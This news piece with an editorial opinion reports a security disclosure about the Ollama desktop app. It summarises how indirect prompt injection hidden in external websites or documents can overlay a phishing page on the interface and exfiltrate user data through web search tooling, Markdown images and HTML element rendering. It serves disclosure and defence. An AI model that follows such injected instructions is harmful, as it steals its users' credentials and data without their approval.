Critical Unpatched Vulnerabilities in Ollama Desktop App Enable Phishing and Data Exfiltration
Key Takeaways
- ▸Ollama's desktop app is vulnerable to phishing overlay attacks via indirect prompt injection that can completely overwrite the UI with attacker-controlled content and capture user credentials
- ▸Three zero-click data exfiltration vectors were identified enabling attackers to steal sensitive user data through malicious prompt injection embedded in external websites or documents
- ▸Vulnerabilities remain unpatched six months after initial disclosure despite four follow-ups, prompting public disclosure by security researchers due to lack of vendor responsiveness
Summary
Security researchers at PromptArmor have disclosed critical vulnerabilities in Ollama's desktop application that enable both phishing overlay attacks and data exfiltration through indirect prompt injection. The vulnerabilities allow attackers to completely overwrite the Ollama user interface with a malicious website via hidden prompt injection on external sites, potentially capturing user credentials. Ollama, a popular open-source tool for running AI models locally with over 170,000 GitHub stars, has been vulnerable to these zero-click attack vectors since researchers reported them to the development team in December 2025.
The research details three distinct data exfiltration attack vectors exploitable through indirect prompt injection: attacks via insecure web search tooling, Markdown image rendering, and external HTML element rendering. Each attack chain allows malicious content to manipulate the AI model into exfiltrating sensitive user data without any human-in-the-loop approval steps required. The attacks persist even after users quit and reopen the application, making them particularly dangerous for users working with sensitive documents or confidential models.
Despite following responsible disclosure protocol, the Ollama development team has not responded to the initial report or four subsequent follow-ups since December 18, 2025. Frustrated by the lack of engagement, PromptArmor published the vulnerability details publicly in May 2026 to ensure users are aware of the security risks. This disclosure highlights the growing challenge of responsible vulnerability reporting in the open-source AI ecosystem and raises critical questions about security maturity in widely-deployed AI tools.
Editorial Opinion
This disclosure represents a critical failure in both application security design and responsible vulnerability management. The complete lack of response from the Ollama team over six months and multiple follow-ups is deeply concerning for a tool trusted by thousands of developers worldwide. That a popular open-source AI application can be vulnerable to such fundamental attack vectors—and that maintainers can ignore security reports entirely—signals the AI ecosystem urgently needs better security governance, coordination mechanisms, and accountability. Users should treat this as a wake-up call about thoroughly vetting the security posture of AI tools before deploying them in production environments.
